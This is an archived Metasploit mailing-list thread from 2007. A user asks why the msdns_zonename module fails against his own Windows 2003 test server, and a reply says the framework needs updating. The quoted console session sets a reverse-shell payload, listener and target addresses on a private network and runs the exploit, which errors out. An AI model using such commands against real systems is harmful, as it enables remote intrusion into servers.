Metasploit mailing list archives

Problem exploiting the MS DNS RPC Service (msdns_zonename)


From: msairam at intoto.com (M.P.Sairam)
Date: Thu, 07 Jun 2007 09:13:54 +0530

Hi Jason,
    I think you didn't upgraded the MSF.
    This Problem was already discovered. Can you check the mailing list 
and discussion was on the topic 'Updated Microsoft DNS modules'


Thanks,
   --
Sairam

Jason Thompson wrote:
Hi all. I am trying to get the MS DNS exploit to work, everytime I try
it against my vulnerable Windows 2003 server I get this:



set PAYLOAD windows/shell_reverse_tcp

PAYLOAD => windows/shell_reverse_tcp

set LHOST 192.168.0.211

LHOST => 192.168.0.211

set LPORT 4444

LPORT => 4444

set RHOST 192.168.0.207

RHOST => 192.168.0.207

exploit

[*] Started reverse handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 1028
[-] Exploit failed: undefined method `name' for nil:NilClass

msf exploit(msdns_zonename) >



Any ideas? THanks!

-J





********************************************************************************
This email message (including any attachments) is for the sole use of the intended recipient(s) 
and may contain confidential, proprietary and privileged information. Any unauthorized review, 
use, disclosure or distribution is prohibited. If you are not the intended recipient, 
please immediately notify the sender by reply email and destroy all copies of the original message. 
Thank you.
 
Intoto Inc. 




Current thread: